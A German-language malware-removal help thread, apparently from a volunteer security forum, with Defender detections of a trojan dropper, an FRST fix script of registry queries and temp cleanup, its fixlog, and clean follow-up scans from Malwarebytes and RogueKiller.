Date: 2021-01-10 00:42:44.1650000Z

Description: 

Microsoft Defender Antivirus hat Schadsoftware oder andere potenziell unerwünschte Software erkannt.

Weitere Informationen:

https://go.microsoft.com/fwlink/?linkid=37020&name=TrojanDropper:Win64/Tnega!MSR&threatid=2147771646&enterprise=0

Name: TrojanDropper:Win64/Tnega!MSR

ID: 2147771646

Schweregrad: Schwerwiegend

Kategorie: Trojaner - Dropper

Pfad: file:_C:\Users\buskr5\AppData\Local\Temp\GetX64BTIT.exe

Erkennungsursprung: Lokaler Computer

Erkennungstype: Konkret

Erkennungsquelle: Echtzeitschutz

Benutzer: PC5-L\buskr5

Prozessname: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

Sicherheitsversion: AV: 1.329.1924.0, AS: 1.329.1924.0, NIS: 1.329.1924.0

Modulversion: AM: 1.1.17700.4, NIS: 1.1.17700.4
 

Date: 2021-01-10 00:40:11.7500000Z

Description: 

Microsoft Defender Antivirus hat Schadsoftware oder andere potenziell unerwünschte Software erkannt.

Weitere Informationen:

https://go.microsoft.com/fwlink/?linkid=37020&name=TrojanDropper:Win64/Tnega!MSR&threatid=2147771646&enterprise=0

Name: TrojanDropper:Win64/Tnega!MSR

ID: 2147771646

Schweregrad: Schwerwiegend

Kategorie: Trojaner - Dropper

Pfad: file:_C:\Users\buskr5\AppData\Local\Temp\GetX64BTIT.exe

Erkennungsursprung: Lokaler Computer

Erkennungstype: Konkret

Erkennungsquelle: Echtzeitschutz

Benutzer: PC5-L\buskr5

Prozessname: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

Sicherheitsversion: AV: 1.329.1924.0, AS: 1.329.1924.0, NIS: 1.329.1924.0

Modulversion: AM: 1.1.17700.4, NIS: 1.1.17700.4
 

Date: 2021-01-09 18:21:34.8610000Z

Description: 

Microsoft Defender Antivirus hat Schadsoftware oder andere potenziell unerwünschte Software erkannt.

Weitere Informationen:

https://go.microsoft.com/fwlink/?linkid=37020&name=TrojanDropper:Win64/Tnega!MSR&threatid=2147771646&enterprise=0

Name: TrojanDropper:Win64/Tnega!MSR

ID: 2147771646

Schweregrad: Schwerwiegend

Kategorie: Trojaner - Dropper

Pfad: file:_C:\Users\buskr5\AppData\Local\Temp\GetX64BTIT.exe

Erkennungsursprung: Lokaler Computer

Erkennungstype: Konkret

Erkennungsquelle: Echtzeitschutz

Benutzer: PC5-L\buskr5

Prozessname: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

Sicherheitsversion: AV: 1.329.1924.0, AS: 1.329.1924.0, NIS: 1.329.1924.0

Modulversion: AM: 1.1.17700.4, NIS: 1.1.17700.4
 

Date: 2021-01-09 15:47:12.9890000Z

Description: 

Microsoft Defender Antivirus hat Schadsoftware oder andere potenziell unerwünschte Software erkannt.

Weitere Informationen:

https://go.microsoft.com/fwlink/?linkid=37020&name=TrojanDropper:Win64/Tnega!MSR&threatid=2147771646&enterprise=0

Name: TrojanDropper:Win64/Tnega!MSR

ID: 2147771646

Schweregrad: Schwerwiegend

Kategorie: Trojaner - Dropper

Pfad: file:_C:\Users\buskr5\AppData\Local\Temp\GetX64BTIT.exe

Erkennungsursprung: Lokaler Computer

Erkennungstype: Konkret

Erkennungsquelle: Echtzeitschutz

Benutzer: PC5-L\buskr5

Prozessname: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

Sicherheitsversion: AV: 1.329.1924.0, AS: 1.329.1924.0, NIS: 1.329.1924.0

Modulversion: AM: 1.1.17700.4, NIS: 1.1.17700.4
 

Date: 2021-01-09 15:27:32.2830000Z

Description: 

Die Microsoft Defender Antivirus-Überprüfung wurde vor ihrem Abschluss beendet.

Überprüfungs-ID: {CD392251-82AD-4230-8B1B-02F5DAAE2DF1}

Überprüfungstyp: Antimalware

Überprüfungsparameter: Schnellüberprüfung

Benutzer: NT-AUTORITÄT\SYSTEM
 

CodeIntegrity:

===================================
 

Date: 2021-01-10 09:04:21.4770000Z

Description: 

Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\Program Files\Bonjour\mdnsNSP.dll that did not meet the Windows signing level requirements.
 

Date: 2021-01-10 09:04:21.4740000Z

Description: 

Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\Program Files\Bonjour\mdnsNSP.dll that did not meet the Windows signing level requirements.
 

Date: 2021-01-10 09:04:01.6260000Z

Description: 

Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\Program Files\Bonjour\mdnsNSP.dll that did not meet the Windows signing level requirements.
 

Date: 2021-01-10 09:04:01.6220000Z

Description: 

Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\Program Files\Bonjour\mdnsNSP.dll that did not meet the Windows signing level requirements.
 

Date: 2021-01-10 09:04:01.4900000Z

Description: 

Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\Program Files\Bonjour\mdnsNSP.dll that did not meet the Windows signing level requirements.
 

Date: 2021-01-10 09:04:01.4870000Z

Description: 

Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\Program Files\Bonjour\mdnsNSP.dll that did not meet the Windows signing level requirements.
 

Date: 2021-01-10 09:04:01.4840000Z

Description: 

Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\Program Files\Bonjour\mdnsNSP.dll that did not meet the Windows signing level requirements.
 

Date: 2021-01-10 09:04:01.4800000Z

Description: 

Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\Program Files\Bonjour\mdnsNSP.dll that did not meet the Windows signing level requirements.
 

==================== Speicherinformationen =========================== 
 

BIOS: FUJITSU // Insyde Software Corp. Version 2.05 06/25/2019

Hauptplatine: FUJITSU FJNBB5C

Prozessor: Intel(R) Core(TM) i3-6006U CPU @ 2.00GHz

Prozentuale Nutzung des RAM: 40%

Installierter physikalischer RAM: 8088.56 MB

Verfügbarer physikalischer RAM: 4825.03 MB

Summe virtueller Speicher: 9368.56 MB

Verfügbarer virtueller Speicher: 6347.04 MB
 

==================== Laufwerke ================================
 

Drive c: () (Fixed) (Total:237.32 GB) (Free:163.87 GB) NTFS
 

\\?\Volume{d4bd63c3-9f0a-44ee-af4e-35806701b471}\ () (Fixed) (Total:0.49 GB) (Free:0.47 GB) NTFS

\\?\Volume{60a0e813-3eea-47c5-87e8-d6c29f22d114}\ () (Fixed) (Total:0.55 GB) (Free:0.08 GB) NTFS

\\?\Volume{ff4dfa97-53c2-4020-9f39-7bdc41872594}\ () (Fixed) (Total:0.09 GB) (Free:0.07 GB) FAT32
 

==================== MBR & Partitionstabelle ====================
 

==========================================================

Disk: 0 (Protective MBR) (Size: 238.5 GB) (Disk ID: 00000000)
 

Partition: GPT.
 

==================== Ende von Addition.txt =======================

Scripting/Repair mit FRST64

Kopiere den gesamten Inhalt der folgenden Code-Box:

Code:

Start:: cmd: reg query "HKU\S-1-5-21-4192198180-2913720414-2796424460-500\Environment" cmd: reg query "HKU\S-1-5-21-4192198180-2913720414-2796424460-500\Software" cmd: reg query "HKU\S-1-5-21-4192198180-2913720414-2796424460-501\Environment" cmd: reg query "HKU\S-1-5-21-4192198180-2913720414-2796424460-501\Software" cmd: reg query "HKU\S-1-5-21-4192198180-2913720414-2796424460-503\Environment" cmd: reg query "HKU\S-1-5-21-4192198180-2913720414-2796424460-503\Software" cmd: reg query "HKU\S-1-5-21-4192198180-2913720414-2796424460-504\Environment" cmd: reg query "HKU\S-1-5-21-4192198180-2913720414-2796424460-504\Software" cmd: reg query "HKU\S-1-5-21-4192198180-2913720414-2796424460-1001\Environment" cmd: reg query "HKU\S-1-5-21-4192198180-2913720414-2796424460-1001\Software" cmd: reg query "HKU\S-1-5-21-4192198180-2913720414-2796424460-1002\Environment" cmd: reg query "HKU\S-1-5-21-4192198180-2913720414-2796424460-1002\Software" emptytemp: End::
Starte nun FRST und klicke direkt den Reparieren Button.Wichtig: Du brauchst den Inhalt der Code-Box nirgends einfügen, da sich FRST den Code aus der Zwischenablage holt!
Das Tool führt die gewünschten Schritte aus und erstellt eine fixlog.txt im selben Verzeichnis, in dem sich FRST befindet.
Gegebenenfalls muss dein Rechner neu gestartet werden.
Poste mir den Inhalt der fixlog.txt mit deiner nächsten Antwort.

Code:

Entfernungsergebnis von Farbar Recovery Scan Tool (x64) Version: 09-01-2021

durchgeführt von buskr5 (11-01-2021 19:41:07) Run:4

Gestartet von C:\Users\buskr5\Downloads

Geladene Profile: buskr5

Start-Modus: Normal

==============================================
 

fixlist Inhalt:

*****************

cmd: reg query "HKU\S-1-5-21-4192198180-2913720414-2796424460-500\Environment"

cmd: reg query "HKU\S-1-5-21-4192198180-2913720414-2796424460-500\Software"

cmd: reg query "HKU\S-1-5-21-4192198180-2913720414-2796424460-501\Environment"

cmd: reg query "HKU\S-1-5-21-4192198180-2913720414-2796424460-501\Software"

cmd: reg query "HKU\S-1-5-21-4192198180-2913720414-2796424460-503\Environment"

cmd: reg query "HKU\S-1-5-21-4192198180-2913720414-2796424460-503\Software"

cmd: reg query "HKU\S-1-5-21-4192198180-2913720414-2796424460-504\Environment"

cmd: reg query "HKU\S-1-5-21-4192198180-2913720414-2796424460-504\Software"

cmd: reg query "HKU\S-1-5-21-4192198180-2913720414-2796424460-1001\Environment"

cmd: reg query "HKU\S-1-5-21-4192198180-2913720414-2796424460-1001\Software"

cmd: reg query "HKU\S-1-5-21-4192198180-2913720414-2796424460-1002\Environment"

cmd: reg query "HKU\S-1-5-21-4192198180-2913720414-2796424460-1002\Software"

emptytemp:
 

*****************
 
 

========= reg query "HKU\S-1-5-21-4192198180-2913720414-2796424460-500\Environment" =========
 

FEHLER: Der angegebene Registrierungsschlssel bzw. Wert wurde nicht gefunden.
 

========= Ende von CMD: =========
 
 

========= reg query "HKU\S-1-5-21-4192198180-2913720414-2796424460-500\Software" =========
 

FEHLER: Der angegebene Registrierungsschlssel bzw. Wert wurde nicht gefunden.
 

========= Ende von CMD: =========
 
 

========= reg query "HKU\S-1-5-21-4192198180-2913720414-2796424460-501\Environment" =========
 

FEHLER: Der angegebene Registrierungsschlssel bzw. Wert wurde nicht gefunden.
 

========= Ende von CMD: =========
 
 

========= reg query "HKU\S-1-5-21-4192198180-2913720414-2796424460-501\Software" =========
 

FEHLER: Der angegebene Registrierungsschlssel bzw. Wert wurde nicht gefunden.
 

========= Ende von CMD: =========
 
 

========= reg query "HKU\S-1-5-21-4192198180-2913720414-2796424460-503\Environment" =========
 

FEHLER: Der angegebene Registrierungsschlssel bzw. Wert wurde nicht gefunden.
 

========= Ende von CMD: =========
 
 

========= reg query "HKU\S-1-5-21-4192198180-2913720414-2796424460-503\Software" =========
 

FEHLER: Der angegebene Registrierungsschlssel bzw. Wert wurde nicht gefunden.
 

========= Ende von CMD: =========
 
 

========= reg query "HKU\S-1-5-21-4192198180-2913720414-2796424460-504\Environment" =========
 

FEHLER: Der angegebene Registrierungsschlssel bzw. Wert wurde nicht gefunden.
 

========= Ende von CMD: =========
 
 

========= reg query "HKU\S-1-5-21-4192198180-2913720414-2796424460-504\Software" =========
 

FEHLER: Der angegebene Registrierungsschlssel bzw. Wert wurde nicht gefunden.
 

========= Ende von CMD: =========
 
 

========= reg query "HKU\S-1-5-21-4192198180-2913720414-2796424460-1001\Environment" =========
 

FEHLER: Der angegebene Registrierungsschlssel bzw. Wert wurde nicht gefunden.
 

========= Ende von CMD: =========
 
 

========= reg query "HKU\S-1-5-21-4192198180-2913720414-2796424460-1001\Software" =========
 

FEHLER: Der angegebene Registrierungsschlssel bzw. Wert wurde nicht gefunden.
 

========= Ende von CMD: =========
 
 

========= reg query "HKU\S-1-5-21-4192198180-2913720414-2796424460-1002\Environment" =========
 
 

HKEY_USERS\S-1-5-21-4192198180-2913720414-2796424460-1002\Environment

    Path    REG_EXPAND_SZ    %USERPROFILE%\AppData\Local\Microsoft\WindowsApps;

    TEMP    REG_EXPAND_SZ    %USERPROFILE%\AppData\Local\Temp

    TMP    REG_EXPAND_SZ    %USERPROFILE%\AppData\Local\Temp

    OneDrive    REG_EXPAND_SZ    C:\Users\buskr5\OneDrive
 
 

========= Ende von CMD: =========
 
 

========= reg query "HKU\S-1-5-21-4192198180-2913720414-2796424460-1002\Software" =========
 
 

HKEY_USERS\S-1-5-21-4192198180-2913720414-2796424460-1002\Software\Adobe

HKEY_USERS\S-1-5-21-4192198180-2913720414-2796424460-1002\Software\Alps

HKEY_USERS\S-1-5-21-4192198180-2913720414-2796424460-1002\Software\AppDataLow

HKEY_USERS\S-1-5-21-4192198180-2913720414-2796424460-1002\Software\Apple Computer, Inc.

HKEY_USERS\S-1-5-21-4192198180-2913720414-2796424460-1002\Software\Apple Inc.

HKEY_USERS\S-1-5-21-4192198180-2913720414-2796424460-1002\Software\BEDI_BelegTransfer

HKEY_USERS\S-1-5-21-4192198180-2913720414-2796424460-1002\Software\DATEV eG

HKEY_USERS\S-1-5-21-4192198180-2913720414-2796424460-1002\Software\Deltaplan E-Mail V56

HKEY_USERS\S-1-5-21-4192198180-2913720414-2796424460-1002\Software\FastViewer

HKEY_USERS\S-1-5-21-4192198180-2913720414-2796424460-1002\Software\Google

HKEY_USERS\S-1-5-21-4192198180-2913720414-2796424460-1002\Software\HP

HKEY_USERS\S-1-5-21-4192198180-2913720414-2796424460-1002\Software\IM Providers

HKEY_USERS\S-1-5-21-4192198180-2913720414-2796424460-1002\Software\Intel

HKEY_USERS\S-1-5-21-4192198180-2913720414-2796424460-1002\Software\MediaHuman

HKEY_USERS\S-1-5-21-4192198180-2913720414-2796424460-1002\Software\Microsoft

HKEY_USERS\S-1-5-21-4192198180-2913720414-2796424460-1002\Software\Netscape

HKEY_USERS\S-1-5-21-4192198180-2913720414-2796424460-1002\Software\ODBC

HKEY_USERS\S-1-5-21-4192198180-2913720414-2796424460-1002\Software\Piriform

HKEY_USERS\S-1-5-21-4192198180-2913720414-2796424460-1002\Software\Policies

HKEY_USERS\S-1-5-21-4192198180-2913720414-2796424460-1002\Software\RegisteredApplications

HKEY_USERS\S-1-5-21-4192198180-2913720414-2796424460-1002\Software\Selteco

HKEY_USERS\S-1-5-21-4192198180-2913720414-2796424460-1002\Software\ShrewSoft

HKEY_USERS\S-1-5-21-4192198180-2913720414-2796424460-1002\Software\TeamViewer

HKEY_USERS\S-1-5-21-4192198180-2913720414-2796424460-1002\Software\Wow6432Node

HKEY_USERS\S-1-5-21-4192198180-2913720414-2796424460-1002\Software\Classes
 

========= Ende von CMD: =========
 
 

=========== EmptyTemp: ==========
 

BITS transfer queue => 10510336 B

DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 69770373 B

Java, Flash, Steam htmlcache => 0 B

Windows/system/drivers => 2342016 B

Edge => 0 B

Chrome => 624777213 B

Firefox => 0 B

Opera => 0 B
 

Temp, IE cache, history, cookies, recent:

Default => 0 B

Users => 0 B

ProgramData => 0 B

Public => 0 B

systemprofile => 0 B

systemprofile32 => 0 B

LocalService => 0 B

NetworkService => 6520 B

ITMueller => 6520 B

buskr5 => 106934551 B
 

RecycleBin => 646499 B

EmptyTemp: => 777.2 MB temporäre Dateien entfernt.
 

================================
 
 

Das System musste neu gestartet werden.
 

==== Ende von Fixlog 19:41:40 ====

Kontrollscans mit MBAM und RK

Wir sind fast fertig. Jetzt ist es an der Zeit für Kontrollscans mit

Poste nach Abschluss der beiden Scans die Logs in CODE-Tags.

Code:

Malwarebytes

www.malwarebytes.com
 

-Protokolldetails-

Scan-Datum: 14.01.21

Scan-Zeit: 18:08

Protokolldatei: 1eeb5b4e-568b-11eb-a1e5-38afd7394da2.json
 

-Softwaredaten-

Version: 4.3.0.98

Komponentenversion: 1.0.1130

Version des Aktualisierungspakets: 1.0.35739

Lizenz: Testversion
 

-Systemdaten-

Betriebssystem: Windows 10 (Build 19041.746)

CPU: x64

Dateisystem: NTFS

Benutzer: PC5-L\buskr5
 

-Scan-Übersicht-

Scan-Typ: Bedrohungs-Scan

Scan gestartet von: Manuell

Ergebnis: Abgeschlossen

Gescannte Objekte: 303604

Erkannte Bedrohungen: 0

In die Quarantäne verschobene Bedrohungen: 0

Abgelaufene Zeit: 4 Min., 20 Sek.
 

-Scan-Optionen-

Speicher: Aktiviert

Start: Aktiviert

Dateisystem: Aktiviert

Archive: Aktiviert

Rootkits: Aktiviert

Heuristik: Aktiviert

PUP: Erkennung

PUM: Erkennung
 

-Scan-Details-

Prozess: 0

(keine bösartigen Elemente erkannt)
 

Modul: 0

(keine bösartigen Elemente erkannt)
 

Registrierungsschlüssel: 0

(keine bösartigen Elemente erkannt)
 

Registrierungswert: 0

(keine bösartigen Elemente erkannt)
 

Registrierungsdaten: 0

(keine bösartigen Elemente erkannt)
 

Daten-Stream: 0

(keine bösartigen Elemente erkannt)
 

Ordner: 0

(keine bösartigen Elemente erkannt)
 

Datei: 0

(keine bösartigen Elemente erkannt)
 

Physischer Sektor: 0

(keine bösartigen Elemente erkannt)
 

WMI: 0

(keine bösartigen Elemente erkannt)
 
 

(end)

Code:

RogueKiller Anti-Malware V14.8.4.0 (x64) [Jan 13 2021] (Free) von Adlice Software

Mail : https://adlice.com/contact/

Website : https://adlice.com/download/roguekiller/

Betriebssystem : Windows 10 (10.0.19042) 64 bits

Gestartet in : Normaler Modus

Benutzer : buskr5 [Administrator]

Gestartet von : C:\Users\buskr5\Downloads\RogueKiller_portable64.exe

Signaturen : 20210111_142503, Treiber : Geladen

Modus : Schneller Scan, Scannen -- Datum : 2021/01/14 18:14:08 (Dauer : 00:00:41)
 

¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Prozesse ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
 

¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Prozessmodule ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
 

¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Dienste ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
 

¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Tasks ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
 

¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Registry ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
 

¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ WMI ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
 

¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Hosts-Datei ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
 

¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Dateien ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
 

¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Webbrowser ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
 

¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Anti-Rootkit : 0 (Driver: Geladen) ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤

Dann wären wir durch! :daumenhoc

Wenn Du möchtest, kannst Du hier sagen, ob Du mit mir und meiner Hilfe zufrieden warst...:dankeschoen:und/oder das Forum mit einer kleinen Spende http://www.trojaner-board.de/extra/spende.png unterstützen. :applaus:

Abschließend bitte noch einen Cleanup mit unserem TB-Cleanup-Script durchführen und unbedingt die Sicherheitsmaßnahmen lesen und umsetzen - beides ist in folgendem Lesestoff verlinkt:

Anleitung: Cleanup & Maßnahmen zur Absicherung des Rechners

Wir sind froh, dass wir helfen konnten :abklatsch:

Dieses Thema scheint erledigt und wird aus unseren Abos gelöscht. Solltest Du das Thema erneut brauchen, schicke uns bitte eine Erinnerung inklusive Link zum Thema.

Jeder andere bitte hier klicken und ein eigenes Thema erstellen.